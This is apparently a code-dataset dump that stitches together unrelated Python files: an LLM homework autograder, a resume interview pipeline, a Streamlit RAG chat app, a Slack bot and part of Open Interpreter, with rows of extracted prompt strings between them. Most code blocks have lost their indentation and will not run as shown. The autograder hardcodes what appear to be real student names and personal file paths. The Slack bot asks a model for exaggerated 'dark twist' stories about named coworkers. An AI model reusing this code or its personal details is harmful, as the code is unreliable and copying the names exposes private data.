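# ("graphic-number-xxx": "caption") format shown in the example output and turns it into a dict.
import re
def parse_captions(reply: str) -> dict:
    return dict(re.findall(r'\("(graphic-number-\d{3})":\s*"([^"]*)"\)', reply))
# parse_captions('("graphic-number-001": "Tools needed for installation.")')
# -> {'graphic-number-001': 'Tools needed for installation.'}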
| [
"num_graphics",
"description to the graphic",
"\n In a document you will find {num_graphics} codes in a format \n graphic-number-xxx where xxx are three integers.\n For example graphic-number-003.\n Your aim is to make a brief summary of the text around the codes, \n especially in a paragraph just before the text.\n You provide a reply in a format:\n (\"graphic-number-001\": \"description to the graphic\")\n\n Document: {document}\n ",
"graphic-number-001",
"document"
] |
2024-01-10 | weizhenFrank/AutoGrader | autograder.py | import openai
import os
import zipfile
import csv
import tqdm
import time
import re
# Initialize GPT-4 API
openai.api_key = os.getenv('OPENAI_API_KEY')
# [Update your standard answers here]
FREQ = 30
assignment_answers = {
"layers.py": """
TODO1:
pad = conv_param['pad']
stride = conv_param['stride']
N, C, H, W = x.shape
F, _, HH, WW = w.shape
H_filter = (H + 2*pad - HH)/stride + 1
W_filter = (W + 2*pad - WW)/stride + 1
out = np.zeros((N, F, H_filter, W_filter))
x = np.pad(x, pad_width=((0,), (0,), (pad,), (pad,)), mode='constant', constant_values=0)
for i in range(N):
for z in range(F):
for j in range(H_filter):
for k in range(W_filter):
out[i,z,j,k] = np.sum(x[i,:,j*stride:(j*stride+HH),k*stride:(k*stride+WW)]*w[z,:,:,:])+b[z]
TODO2:
N, C, H, W = x.shape
pool_H = pool_param['pool_height']
pool_W = pool_param['pool_width']
stride = pool_param['stride']
H_filter = (H-pool_H)/stride + 1
W_filter = (W-pool_W)/stride + 1
out = np.zeros((N,C,H_filter,W_filter))
for j in range(H_filter):
for k in range(W_filter):
out[:,:,j,k] = x[:,:,j*stride:(j*stride+pool_H),k*stride:(k*stride+pool_W)].max(axis=(2,3))
"""
}
def student_already_graded(student_name, results_csv):
with open(results_csv, mode='r', newline='') as file:
reader = csv.reader(file)
for row in reader:
if row and student_name in row[0]:
return True
return False
def grade_assignment_per_file(student_answer, standard_answer, section_name, point=2.5):
format = {'layers.py':f"TODO1: 2.5/{point}, Correct; TODO2: 1/{point}, reason: ...; ",
}
messages = [
{"role": "system", "content": "You are a helpful grading assistant."},
{
"role": "user",
"content": f"Grade the following answers for {section_name}:\n (Standard Answer): {standard_answer}\n(Student's Answer): {student_answer}. \n \n \n You should compare each todo's answer correspondingly. In student's the python file, the TODO part (the answer) is enclosed by green hash symbols (###). As long as it's implemented correctly, no need to exactly match standard answer. Each TODO is {point}. \n \n \n Strictly follow this output format. Output format:{format[section_name]} \n \n \n Section Score: \n"
}
]
for num in range(3):
if num == 0:
response = openai.ChatCompletion.create(
model="gpt-4",
messages=messages
)
else:
response = openai.ChatCompletion.create(
model="gpt-4",
messages=messages,
temperature=0.3/num,
)
raw_feedback = response['choices'][0]['message']['content'].strip()
match = re.search(r"Section Score: (\d+)/(\d+)", raw_feedback)
if match:
# Convert score to float
final_score = float(match.group(1))
return final_score, raw_feedback
else:
print("Retrying due to missing section score...")
time.sleep(10)
raise Exception("Unable to get section score after multiple attempts")
files_path = {"layers.py":"lib/layers.py",
}
def read_python_file(file_path):
with open(file_path, 'r') as f:
return f.read()
def grade_assignment(student_folder, file_name, standard_answer):
file_path = os.path.join(student_folder, files_path[file_name])
student_answer = read_python_file(file_path)
score, feedback = grade_assignment_per_file(student_answer, standard_answer, file_name)
return score, feedback
# Directory containing all the zip files
zip_dir = "./zip"
# Directory to extract zip files
extract_dir = "./unzip"
os.makedirs(extract_dir, exist_ok=True)
# CSV file to store results
results_csv = "grading_results.csv"
error_students = []
# Open CSV file and write header
with open(results_csv, mode='a', newline='') as file: # mode='a' to append to existing file
writer = csv.writer(file)
# Check if file is empty and write header if it is
if os.path.getsize(results_csv) == 0:
writer.writerow(["Student Name", "Total Score", "Feedback"])
# Loop through all zip files in directory
for zip_file_name in tqdm.tqdm(os.listdir(zip_dir)):
if zip_file_name.endswith(".zip"):
# Extract student name from zip file name
student_name = zip_file_name.split('-')[2]
# Check if student has already been graded
if student_already_graded(student_name, results_csv):
print(f"{student_name} has already been graded. Skipping...")
continue
try: # Add error handling
now = time.time()
# Path to store extracted files for this student
student_extract_dir = os.path.join(extract_dir, student_name)
print("---"*20)
print(f"Grading {student_name}")
# Extract zip file
with zipfile.ZipFile(os.path.join(zip_dir, zip_file_name), 'r') as zip_ref:
zip_ref.extractall(student_extract_dir)
if student_name == " Krishna Chaitanya Pulipati ":
student_extract_dir = '//Users/weizhenliu/Desktop/school/TA/DL/grading/HW5/unzip/ Krishna Chaitanya Pulipati /assignment5'
if student_name == " Minoo Jafarlou ":
student_extract_dir = '/Users/weizhenliu/Desktop/school/TA/DL/grading/HW5/unzip/ Minoo Jafarlou /assignment5'
if student_name == " Ranjit Singh Kanwar ":
student_extract_dir = '/Users/weizhenliu/Desktop/school/TA/DL/grading/HW5/unzip/ Ranjit Singh Kanwar /assignment5'
if student_name == " Sri Harsha Seelamneni ":
student_extract_dir = '/Users/weizhenliu/Desktop/school/TA/DL/grading/HW5/unzip/ Sri Harsha Seelamneni /assignment5/assignment5'
if student_name == " Sumanth Meenan Kanneti ":
student_extract_dir = '/Users/weizhenliu/Desktop/school/TA/DL/grading/HW5/unzip/ Sumanth Meenan Kanneti /Sumanth_Meenan_ass5'
if student_name == " Saloni Ajgaonkar ":
student_extract_dir = '/Users/weizhenliu/Desktop/school/TA/DL/grading/HW5/unzip/ Saloni Ajgaonkar /assignment5'
if student_name == " Meghana Puli ":
student_extract_dir = '/Users/weizhenliu/Desktop/school/TA/DL/grading/HW5/unzip/ Meghana Puli /assignment5)'
if student_name == " Tharun Kumar Bandaru ":
student_extract_dir = '/Users/weizhenliu/Desktop/school/TA/DL/grading/HW5/unzip/ Tharun Kumar Bandaru /Assignment_5'
total_score = 0
all_feedback = []
ans = {'layers.py':5}
for file_name in assignment_answers.keys():
score, feedback = grade_assignment(student_extract_dir, file_name, assignment_answers[file_name])
total_score += score
all_feedback.append(file_name+':'+feedback)
print(f"{file_name}:{score}/{ans[file_name]}\n{feedback}\n")
print(f"Total Score: {total_score}")
print(f"Time taken for {student_name}: {time.time() - now} seconds\n")
print("---"*20)
writer.writerow([student_name, total_score, all_feedback])
time.sleep(FREQ)
except Exception as e: # Handle errors and continue
print(f"An error occurred while grading {student_name}: {str(e)}")
error_students.append(student_name)
print("Continuing with next student...\n")
print("Done grading all students! Exceptions occurred for the following students:")
print(error_students)
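# Tiny sketch of the section-score parsing used in grade_assignment_per_file, run on a made-up
# feedback string; fractional scores are why the regex above accepts digits and a dot.
_sample_feedback = "layers.py: TODO1: 2.5/2.5, Correct; TODO2: 1/2.5, reason: missing stride; Section Score: 3.5/5"
assert float(re.search(r"Section Score: ([\d.]+)/([\d.]+)", _sample_feedback).group(1)) == 3.5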
| [
"You are a helpful grading assistant."
] |
2024-01-10 | ddoddii/resume-ai-chat | inference~pipeline.py | import yaml
import os
import pathlib
from .openai_wrapper import OpenAIChat
class pipelines:
def __init__(self, foundation_model):
self.chat = OpenAIChat(model_name=foundation_model)
self.prompts_path = os.path.join(
os.path.dirname(pathlib.Path(__file__)), "prompts/"
)
with open(
os.path.join(self.prompts_path, "perQ_gen.yaml"), "r", encoding="UTF-8"
) as file:
data = yaml.load(file, Loader=yaml.FullLoader)
self.perQ_gen_prompt = data
with open(
os.path.join(self.prompts_path, "perQ_eval.yaml"), "r", encoding="UTF-8"
) as file:
data = yaml.load(file, Loader=yaml.FullLoader)
self.perQ_eval_prompt = data
with open(
os.path.join(self.prompts_path, "techQ_eval.yaml"), "r", encoding="UTF-8"
) as file:
data = yaml.load(file, Loader=yaml.FullLoader)
self.techQ_eval_prompt = data
with open(
os.path.join(self.prompts_path, "behavQ_eval.yaml"), "r", encoding="UTF-8"
) as file:
data = yaml.load(file, Loader=yaml.FullLoader)
self.behavQ_eval_prompt = data
async def _q_gen(self, position, cv):
if position == "ai":
position = "AI/ML Engineer"
elif position == "be":
position = "Backend Developer"
elif position == "fe":
position = "Frontend Developer"
elif position == "mobile":
position = "Mobile Developer"
messages_list = [
{"role": "system", "content": self.perQ_gen_prompt["system"]},
{
"role": "user",
"content": self.perQ_gen_prompt["user"].format(
position=position, cv=cv
),
},
]
return await self.chat.async_run(messages_list)
async def _a_eval(self, type, question, answer, criteria):
if type == "behavQ":
messages_list = [
{"role": "system", "content": self.behavQ_eval_prompt["system"]},
{
"role": "user",
"content": self.behavQ_eval_prompt["user"].format(
question=question, answer=answer, criteria=criteria
),
},
]
elif type == "techQ":
messages_list = [
{"role": "system", "content": self.techQ_eval_prompt["system"]},
{
"role": "user",
"content": self.techQ_eval_prompt["user"].format(
question=question, answer=answer, criteria=criteria
),
},
]
elif type == "perQ":
messages_list = [
{"role": "system", "content": self.perQ_eval_prompt["system"]},
{
"role": "user",
"content": self.perQ_eval_prompt["user"].format(
question=question, answer=answer, criteria=criteria
),
},
]
else:
assert "ERROR : type should be one of behavQ, techQ, perQ"
# print(messages_list)
return await self.chat.async_run(messages_list)
async def q_gen(self, cv, position):
self.response, self.token = await self._q_gen(position=position, cv=cv)
return self.response, self.token
async def a_eval(self, type, question, answer, criteria):
self.response, self.token = await self._a_eval(
type=type, question=question, answer=answer, criteria=criteria
)
return self.response, self.token
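# Hedged usage sketch (not part of the original module). It assumes the prompt YAML files exist next to
# this package, that OPENAI_API_KEY is set, and that it is launched with package context, e.g.
# `python -m inference.pipeline` from the project root, since the relative imports above require it.
if __name__ == "__main__":
    import asyncio
    async def _demo():
        pipe = pipelines(foundation_model="gpt-3.5-turbo")
        questions, tokens = await pipe.q_gen(cv="3 years of PyTorch; built a RAG chatbot", position="ai")
        print(questions, tokens)
    asyncio.run(_demo())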
| [] |
2024-01-10 | antlatt/chat_antlatt_com | app2.py | import streamlit as st
import datetime
import time
from langchain.llms.ollama import Ollama
from langchain.chat_models import ChatOllama
import langchain.document_loaders
from langchain.text_splitter import RecursiveCharacterTextSplitter
from langchain.embeddings.gpt4all import GPT4AllEmbeddings
from langchain.vectorstores.chroma import Chroma
from langchain.chains import RetrievalQA
from langchain.cache import InMemoryCache
from langchain.globals import set_llm_cache
from streamlit_extras.add_vertical_space import add_vertical_space
from PyPDF2 import PdfReader
from langchain.memory.chat_message_histories.in_memory import ChatMessageHistory
from langchain.schema import messages_from_dict, messages_to_dict
from langchain.memory import ConversationBufferMemory
from langchain.chains import ConversationalRetrievalChain, ConversationChain
from langchain.agents.initialize import initialize_agent
from langchain.agents.agent_types import AgentType
from langchain.tools import Tool
from langchain.tools import BaseTool
from langchain.tools.ddg_search import DuckDuckGoSearchRun
from langchain.tools.wikipedia.tool import WikipediaQueryRun
from langchain.utilities.wikipedia import WikipediaAPIWrapper
import langchain
ollama = ChatOllama(base_url='http://192.168.1.81:11434', model='dolphin2.2-mistral', temperature=0.1, streaming=True)
set_llm_cache(InMemoryCache())
### CREATE VECTORSTORE FUNCTION
def db_lookup():
# Try the URL first; any failure (including an empty URL field) drops through to the PDF branch via the bare except below.
try:
if url is not None:
loader = langchain.document_loaders.WebBaseLoader(url)
documents = loader.load()
len(documents)
text_splitter = RecursiveCharacterTextSplitter(chunk_size=1000, chunk_overlap=50)
texts = text_splitter.split_documents(documents)
len(texts)
persist_directory = "./vectorstores/db/"
embeddings = GPT4AllEmbeddings()
vectordb = Chroma.from_documents(documents=texts, embedding=embeddings, persist_directory=persist_directory)
vectordb.persist()
vectordb = None
except:
if pdf is not None:
pdf_reader = PdfReader(pdf)
# st.write(pdf_reader)
text = ""
for page in pdf_reader.pages:
text += page.extract_text()
# st.write(text)
# len(pdf_documents)
pdf_text_splitter = RecursiveCharacterTextSplitter(chunk_size=1000, chunk_overlap=200)
# st.write(pdf_text_splitter)
pdf_texts = pdf_text_splitter.split_text(text=text)
len(pdf_texts)
# st.write(pdf_splits)
persist_directory = "./vectorstores/db/"
pdf_embeddings = GPT4AllEmbeddings()
pdf_vectordb = Chroma.from_texts(pdf_texts, embedding=pdf_embeddings, persist_directory=persist_directory)
pdf_vectordb.persist()
pdf_vectordb = None
# Sidebar Contents
with st.sidebar:
st.sidebar.title('ANTLATT.com')
st.sidebar.header('Add More Data to the Database')
##SIDEBAR PDF INPUT
pdf = st.sidebar.file_uploader("Upload a PDF", type="pdf", disabled=False)
###SIDEBAR URL INPUT
url = st.sidebar.text_input('Enter a URL', placeholder="enter url here", disabled=False)
with st.form('myform2', clear_on_submit=True):
persist_directory = "/vectorstores/db"
submitted = st.form_submit_button('Submit', disabled=not(url or pdf))
if submitted:
with st.spinner('Creating VectorStore, Saving to Disk...'):
db_lookup()
with st.success('Done!'):
st.write('VectorStore Created and Saved to Disk')
st.markdown('''
## About
This is an LLM-powered chatbot built using:
- [Streamlit](https://streamlit.io)
- [Langchain](https://python.langchain.com)
- [Ollama](https://ollama.com)
- [Mistral-7b](https://huggingface.co/illuin/mistral-7b)
''')
add_vertical_space(5)
st.write('Made by [antlatt](https://www.antlatt.com)')
### MAIN PAGE CONTENTS
st.title('ANTLATT.com')
st.header('Chat with Your Documents')
### Chat App
user_prompt = st.chat_input('Enter your message:', key="user_prompt")
if user_prompt:
st.write(f'You: {user_prompt}')
# Initialize chat history
if "messages" not in st.session_state:
st.session_state.messages = []
# Display chat messages from history on app rerun
for message in st.session_state.messages:
with st.chat_message(message["role"]):
st.markdown(message["content"])
# React to user input
if prompt := st.chat_input("Send a Chat Message to the AI Assistant"):
st.session_state.messages.append({"role": "user", "content": prompt})
with st.chat_message("user"):
st.markdown(prompt)
with st.chat_message("assistant"):
persist_directory = "./vectorstores/db/"
embeddings = GPT4AllEmbeddings()
vectordb = Chroma(persist_directory=persist_directory, embedding_function=embeddings)
retriever = vectordb.as_retriever()
docs = retriever.get_relevant_documents(prompt)
len(docs)
retriever = vectordb.as_retriever(search_kwargs={"k": 3})
retriever.search_type = "similarity"
retriever.search_kwargs = {"k": 3}
qachain = RetrievalQA.from_chain_type(ollama, chain_type="stuff", retriever=retriever, return_source_documents=False)
### ChatOllama_Agent
llm = ChatOllama(base_url='http://192.168.1.81:11434', model='dolphin2.2-mistral', temperature=0.1, streaming=True)
tools = [
Tool(
name="chat",
func=llm.predict,  # pass a callable, not the ChatOllama class itself
description="Useful for chatting with the AI in general conversation."
),
Tool(
name="ddg_search",
func=DuckDuckGoSearchRun().run,  # instantiate the tool and hand the agent its run() method
description="A search engine. Useful for when you need to answer questions about current events. Input should be a search query."
),
Tool(
name="wikipedia_search",
func=WikipediaQueryRun(api_wrapper=WikipediaAPIWrapper()).run,  # expose run() rather than the tool object
description="An online encyclopedia. Search Wikipedia for a query"
),
Tool(
name="vectorstore_search",
func=qachain.run,  # RetrievalQA chain exposed as a plain callable
description="Search the local Database for a query"
)
]
ollama_agent = initialize_agent(tools,
llm,
agent=AgentType.CHAT_ZERO_SHOT_REACT_DESCRIPTION,
verbose=True,
handle_parsing_errors=True)
message_placeholder = st.empty()
full_response = ollama_agent.run(prompt)
message_placeholder.markdown(full_response)
st.session_state.messages.append({"role": "assistant", "content": full_response})
### Chat App End
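# Standalone sketch of querying the persisted store without the Streamlit UI. It assumes the
# ./vectorstores/db/ directory created above exists and that the Ollama server configured at the top
# of this file is reachable; nothing here runs automatically.
def ask_db(question: str) -> str:
    embeddings = GPT4AllEmbeddings()
    vectordb = Chroma(persist_directory="./vectorstores/db/", embedding_function=embeddings)
    qa = RetrievalQA.from_chain_type(ollama, chain_type="stuff", retriever=vectordb.as_retriever(search_kwargs={"k": 3}))
    return qa.run(question)
# ask_db("What does the uploaded manual say about installation?")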
#if __name__ == "__main__":
# main() | [
"user_prompt",
"Enter your message:"
] |
2024-01-10 | scottbonline/clapvontrap | slackbot.py | import os
from openai import OpenAI
from slack_bolt.adapter.socket_mode import SocketModeHandler
from slack_sdk import WebClient
from slack_bolt import App
import logging
#from langchain.chains import LLMChain
#from langchain.prompts import PromptTemplate
from langchain.chat_models import ChatOpenAI
from langchain.llms import OpenAI as lcOpenAI
from langchain.schema import SystemMessage, HumanMessage, AIMessage
import random
from langchain.vectorstores import Chroma
from langchain.embeddings.sentence_transformer import SentenceTransformerEmbeddings
import chromadb
#from chromadb.config import Settings
import re
import time
import spacy
import json
from agent_ability import ability_check
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s - %(levelname)s - [%(funcName)s] - %(message)s",
)
SLACK_BOT_TOKEN = os.getenv('SLACK_BOT_TOKEN')
SLACK_APP_TOKEN = os.getenv('SLACK_APP_TOKEN')
# openai auth token is pulled from system env OPENAI_API_KEY
# init openai using langchain
chat = ChatOpenAI(
# openai_api_key=os.environ["OPENAI_API_KEY"],
# openai_api_base = "http://192.168.1.59:1234/v1",
temperature=0.7,
# model='gpt-3.5-turbo'
model="gpt-4-1106-preview"
# model = "local-model"
)
llm = lcOpenAI()
openai_client = OpenAI()
# init Chroma
chroma_client = chromadb.HttpClient(host="localhost", port=8000)
# chroma_collection = chroma_client.get_or_create_collection("20char")
chroma_collection = chroma_client.get_collection("10word")
# init Slack Event API & Web API
app = App(token=SLACK_BOT_TOKEN)
client = WebClient(SLACK_BOT_TOKEN)
friendly_ai = """You are a friendly AI who is trained in analyzing json to be able to summarize
the contents in relation to what as user is asking. Pay careful attention to who said things, and what
sentiment they used. If the answer is not clear, make up something creative based on the context"""
default_ai_1 = """Imagine you're asked a hypothetical or personality based question about how a certain person
would react in a certain scenario, like being on a deserted island, or are they more positive or negative
about life. Keeping in mind that person's messages based from the provided context, craft a creative,
humorous response that playfully exaggerates their traits. You must always give an answer. Do not complain
about needing additional context"""
generic_ai = """You are an unhelpful AI that doesn't like to be disturbed with questions. If the question doesn't have an answer, express your displeasure."""
default_ai = """You are a creative storyteller who performs the following tasks:
Task #1:
Summarize in less than 100 words everything in the "Context" section
Task #2:
Imagine you're asked a hypothetical or personality based question about how a certain person
would react in a certain scenario, like being on a deserted island, or are they more positive or negative
about life. Keeping in mind that person's messages based from the provided context, craft a creative,
response that exaggerates their traits. You must always give an answer. Do not complain
about needing additional context. Do not mention a desert island in your response.
Your response should be formatted as follows:
Summary: <summary of context>
Analysis: <creative story with a dark twist based on the question>
"""
messages = [
SystemMessage(content=default_ai),
]
messages_generic = [
SystemMessage(content=generic_ai),
]
def valid_users():
file_path = "usermap.json"
with open(file_path, "r") as file:
data = json.load(file)
values_list = list(data.values())
values_list = [name.lower() for name in values_list]
return values_list
def query_chroma(query, subject=None):
logging.info(f"Query: {query}, Sender: {subject}")
if subject:
# FIX can clean this upper case nonsense up on next import of RAG
if not subject[0].isupper():
subject = subject[0].upper() + subject[1:]
c_results = chroma_collection.query(
query_texts=[query],
n_results=10,
# use this to search metadata keys
where={"sender": subject},
# where_document={"$contains":"search_string"}
)
else:
c_results = chroma_collection.query(
query_texts=[query],
n_results=10,
# use this to search metadata keys
# where={"sender": sender},
# where_document={"$contains":"search_string"}
)
# clean results
raw_results = c_results.get("metadatas") + c_results.get("documents")
results = {}
for i in range(len(raw_results[1])):
results[i] = {"metadata": raw_results[0][i], "message": raw_results[1][i]}
return results
def augment_prompt(query: str, sender=None):
# get top X results from Chroma
if sender:
logging.info(f"Subject Detected")
source_knowledge = query_chroma(query, sender)
logging.info(f"Source Knowledge:: {source_knowledge}")
else:
logging.info(f"Subject NOT Detected")
source_knowledge = query_chroma(query)
logging.info(f"Source Knowledge:: {source_knowledge}")
# feed into an augmented prompt
augmented_prompt = f"""{default_ai}
Context:
{source_knowledge}
"""
return augmented_prompt
def image_create(context_from_user):
logging.info(f"Generate image using:: {context_from_user}")
aiimage = openai_client.images.generate(
prompt=context_from_user,
model="dall-e-3",
n=1,
size="1024x1024",
)
return aiimage
def get_subject(query):
if not query[0].isupper():
logging.info(f"add uppercase: {query}")
query = query[0].upper() + query[1:]  # capitalize query itself so the dependency parse below sees it
logging.info("Start Subject Detection")
# Load the English model
nlp = spacy.load("en_core_web_sm")
# Process the sentence
doc = nlp(query)
# generate valid users
valid_names = valid_users()
# Find the subject
for token in doc:
# 'nsubj' stands for nominal subject; 'nsubjpass' stands for passive nominal subject
logging.info(f"Subject Details:: {token.text, token.dep_}")
if token.dep_ in ("nsubj", "nsubjpass", "npadvmod", "dobj"):
if token.text.lower() in valid_names:
logging.info(f"Subject Detected:: {token.text, token.dep_}")
return token.text
logging.info(f"Subject NOT Detected")
return None
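# Quick standalone sketch of the dependency lookup in get_subject, on a made-up question
# (needs the en_core_web_sm model to be installed); it is not called anywhere in the bot.
def _demo_subject_tags(sentence="How would Alice do on a deserted island?"):
    nlp = spacy.load("en_core_web_sm")
    return [(t.text, t.dep_) for t in nlp(sentence) if t.dep_ in ("nsubj", "nsubjpass", "npadvmod", "dobj")]
# _demo_subject_tags() is expected to include ("Alice", "nsubj"), which get_subject would then
# check against the names in usermap.json.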
def chat_response(context_from_user):
# formatting to help with NLP
if not context_from_user[0].isupper():
context_from_user = context_from_user[0].upper() + context_from_user[1:]
logging.info(f"add uppercase: {context_from_user}")
subject = get_subject(context_from_user)
if not subject:
prompt = [
SystemMessage(content=generic_ai),
HumanMessage(content=f"Question: {context_from_user}"),
]
else:
prompt = [
SystemMessage(content=augment_prompt(context_from_user, subject)),
HumanMessage(content=f"Question: {context_from_user}"),
]
logging.info(f"Sending finalized prompt:: {prompt}")
ai_response = chat(prompt)
logging.info(f"Recived response: {ai_response}")
return ai_response
# This gets activated when the bot is tagged in a channel
@app.event("app_mention")
def handle_message_events(body):
context_from_user = str(body["event"]["text"]).split("> ")[1]
# Let thre user know that we are busy with the request
response = client.chat_postMessage(
channel=body["event"]["channel"],
# thread_ts=body["event"]["event_ts"],
text=f"beep, boop: " + context_from_user,
)
logging.info(f"Check Query for Image Request:: {context_from_user}")
if context_from_user.startswith("i:"):
logging.info("Image Search Detected")
ai_response = image_create(context_from_user)
response = client.chat_postMessage(
channel=body["event"]["channel"],
# thread_ts=body["event"]["event_ts"],
text=ai_response.data[0].model_dump()["url"],
)
elif context_from_user.startswith("p:"):
logging.info("BETA Personality Detected")
ai_response = ability_check(context_from_user)
response = client.chat_postMessage(
channel=body["event"]["channel"],
# thread_ts=body["event"]["event_ts"],
text=ai_response,
)
else:
logging.info("No Image Search Detetected")
ai_response = chat_response(context_from_user)
response = client.chat_postMessage(
channel=body["event"]["channel"],
# thread_ts=body["event"]["event_ts"],
text=ai_response.content,
)
# this listens to all messages in all channels
@app.event("message")
def handle_message_events(body, logger):
if "text" in body["event"]:
context_from_user = str(body["event"]["text"])
chance = random.randint(1, 30)
length = len(context_from_user)
logging.info(
f"Random response check:: Context: {context_from_user}, Chance:{chance}, Length:{length}"
)
if (
chance > 25
and length > 8
and context_from_user[-1] == "?"
and "<@U04PUPJ04R0>" not in context_from_user
):
logging.info("Random response activated")
ai_response = chat_response(context_from_user)
response = client.chat_postMessage(
channel=body["event"]["channel"],
# thread_ts=body["event"]["event_ts"],
text=ai_response.content,
)
else:
logger.info(f"No 'text' key found:: {body}")
if __name__ == "__main__":
try:
# start slack handler
SocketModeHandler(app, SLACK_APP_TOKEN).start()
except Exception as e:
print(e)
| [
"Question: PLACEHOLDER",
"PLACEHOLDER\n\n Context:\n PLACEHOLDER\n\n "
] |
2024-01-10 | redsos/open-interpreter | interpreter~interpreter.py | from .cli import cli
from .utils import merge_deltas, parse_partial_json
from .message_block import MessageBlock
from .code_block import CodeBlock
from .code_interpreter import CodeInterpreter
from .llama_2 import get_llama_2_instance
import os
import time
import platform
import openai
import getpass
import requests
import readline
import urllib.parse
import tokentrim as tt
from rich import print
from rich.markdown import Markdown
from rich.rule import Rule
# Function schema for gpt-4
function_schema = {
"name": "run_code",
"description":
"Executes code in various programming languages and returns the output.",
"parameters": {
"type": "object",
"properties": {
"language": {
"type": "string",
"description":
"The programming language.",
"enum": ["python", "shell", "applescript", "javascript", "html"]
},
"code": {
"type": "string",
"description": "The code to execute."
}
},
"required": ["language", "code"]
},
}
# Message for when users don't have an OpenAI API key.
missing_api_key_message = """> OpenAI API key not found
To use `GPT-4` (recommended) please provide an OpenAI API key.
To use `Code-Llama` (free but less capable) press `enter`.
"""
confirm_mode_message = """
**Open Interpreter** will require approval before running code. Use `interpreter -y` to bypass this.
Press `CTRL-C` to exit.
"""
class Interpreter:
def __init__(self):
self.messages = []
self.temperature = 0.001
self.api_key = None
self.auto_run = False
self.local = False
self.model = "gpt-4"
self.debug_mode = False
# Get default system message
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, 'system_message.txt'), 'r') as f:
self.system_message = f.read().strip()
# Store Code Interpreter instances for each language
self.code_interpreters = {}
# No active block to start
# (blocks are visual representation of messages on the terminal)
self.active_block = None
# Note: While Open Interpreter can use Llama, we will prioritize gpt-4.
# gpt-4 is faster, smarter, can call functions, and is all-around easier to use.
# This makes gpt-4 better aligned with Open Interpreters priority to be easy to use.
self.llama_instance = None
def cli(self):
# The cli takes the current instance of Interpreter,
# modifies it according to command line flags, then runs chat.
cli(self)
def get_info_for_system_message(self):
"""
Gets relevent information for the system message.
"""
info = ""
# Add user info
username = getpass.getuser()
current_working_directory = os.getcwd()
operating_system = platform.system()
info += f"\n\n[User Info]\nName: {username}\nCWD: {current_working_directory}\nOS: {operating_system}"
if not self.local:
# Open Procedures is an open-source database of tiny, structured coding tutorials.
# We can query it semantically and append relevant tutorials/procedures to our system message:
# Encode and truncate the last two messages
query = str(self.messages[-2:])
query = urllib.parse.quote(query)
query = query[-2000:]
# Use them to query Open Procedures
url = f"https://open-procedures.replit.app/search/?query={query}"
try:
relevant_procedures = requests.get(url).json()["procedures"]
info += "\n\n# Recommended Procedures\n" + "\n---\n".join(relevant_procedures) + "\nIn your plan, include steps and, if present, **EXACT CODE SNIPPETS** (especially for depracation notices, **WRITE THEM INTO YOUR PLAN -- underneath each numbered step** as they will VANISH once you execute your first line of code, so WRITE THEM DOWN NOW if you need them) from the above procedures if they are relevant to the task. Again, include **VERBATIM CODE SNIPPETS** from the procedures above if they are relevent to the task **directly in your plan.**"
except:
# For someone, this failed for a super secure SSL reason.
# Since it's not strictly necessary, let's worry about that another day. Should probably log this somehow though.
pass
elif self.local:
# Tell Code-Llama how to run code.
info += "\n\nTo run code, simply write a fenced code block (i.e ```python or ```shell) in markdown. When you close it with ```, it will be run. You'll then be given its output."
# We make references in system_message.txt to the "function" it can call, "run_code".
# But functions are not supported by Code-Llama, so:
info = info.replace("run_code", "a markdown code block")
return info
def reset(self):
self.messages = []
self.code_interpreters = {}
def load(self, messages):
self.messages = messages
def chat(self, message=None, return_messages=False):
# Connect to an LLM (an large language model)
if not self.local:
# gpt-4
self.verify_api_key()
# ^ verify_api_key may set self.local to True, so we run this as an 'if', not 'elif':
if self.local:
# Code-Llama
if self.llama_instance == None:
# Find or install Code-Llama
try:
self.llama_instance = get_llama_2_instance()
except:
# If it didn't work, apologize and switch to GPT-4
print(">Failed to install Code-LLama.")
print("\n**We have likely not built the proper `Code-Llama` support for your system.**")
print("\n(Running language models locally is a difficult task! If you have insight into the best way to implement this across platforms/architectures, please join the Open Interpreter community Discord and consider contributing the project's development.)")
print("\nPlease press enter to switch to `GPT-4` (recommended).")
input()
# Switch to GPT-4
self.local = False
self.verify_api_key()
# Display welcome message
welcome_message = ""
if self.debug_mode:
welcome_message += "> Entered debug mode"
# If self.local, we actually don't use self.model
# (self.auto_run is like advanced usage, we display no messages)
if not self.local and not self.auto_run:
welcome_message += f"\n> Model set to `{self.model.upper()}`\n\n**Tip:** To run locally, use `interpreter --local`"
if self.local:
welcome_message += f"\n> Model set to `Code-Llama`"
# If not auto_run, tell the user we'll ask permission to run code
# We also tell them here how to exit Open Interpreter
if not self.auto_run:
welcome_message += "\n\n" + confirm_mode_message
welcome_message = welcome_message.strip()
# Print welcome message with newlines on either side (aesthetic choice)
# unless we're starting with a blockquote (aesthetic choice)
if welcome_message != "":
if welcome_message.startswith(">"):
print(Markdown(welcome_message), '')
else:
print('', Markdown(welcome_message), '')
# Check if `message` was passed in by user
if message:
# If it was, we respond non-interactivley
self.messages.append({"role": "user", "content": message})
self.respond()
else:
# If it wasn't, we start an interactive chat
while True:
try:
user_input = input("> ").strip()
except EOFError:
break
except KeyboardInterrupt:
print() # Aesthetic choice
break
# Use `readline` to let users up-arrow to previous user messages,
# which is a common behavior in terminals.
readline.add_history(user_input)
# Add the user message to self.messages
self.messages.append({"role": "user", "content": user_input})
# Let the user turn on debug mode mid-chat
if user_input == "%debug":
print('', Markdown("> Entered debug mode"), '')
print(self.messages)
self.debug_mode = True
continue
# Respond, but gracefully handle CTRL-C / KeyboardInterrupt
try:
self.respond()
except KeyboardInterrupt:
pass
finally:
# Always end the active block. Multiple Live displays = issues
self.end_active_block()
if return_messages:
return self.messages
def verify_api_key(self):
"""
Makes sure we have an OPENAI_API_KEY.
"""
if self.api_key == None:
if 'OPENAI_API_KEY' in os.environ:
self.api_key = os.environ['OPENAI_API_KEY']
else:
# This is probably their first time here!
print('', Markdown("**Welcome to Open Interpreter.**"), '')
time.sleep(1)
print(Rule(style="white"))
print(Markdown(missing_api_key_message), '', Rule(style="white"), '')
response = input("OpenAI API key: ")
if response == "":
# User pressed `enter`, requesting Code-Llama
self.local = True
print(Markdown("> Switching to `Code-Llama`...\n\n**Tip:** Run `interpreter --local` to automatically use `Code-Llama`."), '')
time.sleep(2)
print(Rule(style="white"))
return
else:
self.api_key = response
print('', Markdown("**Tip:** To save this key for later, run `export OPENAI_API_KEY=your_api_key` on Mac/Linux or `setx OPENAI_API_KEY your_api_key` on Windows."), '')
time.sleep(2)
print(Rule(style="white"))
openai.api_key = self.api_key
def end_active_block(self):
if self.active_block:
self.active_block.end()
self.active_block = None
def respond(self):
# Add relevant info to system_message
# (e.g. current working directory, username, os, etc.)
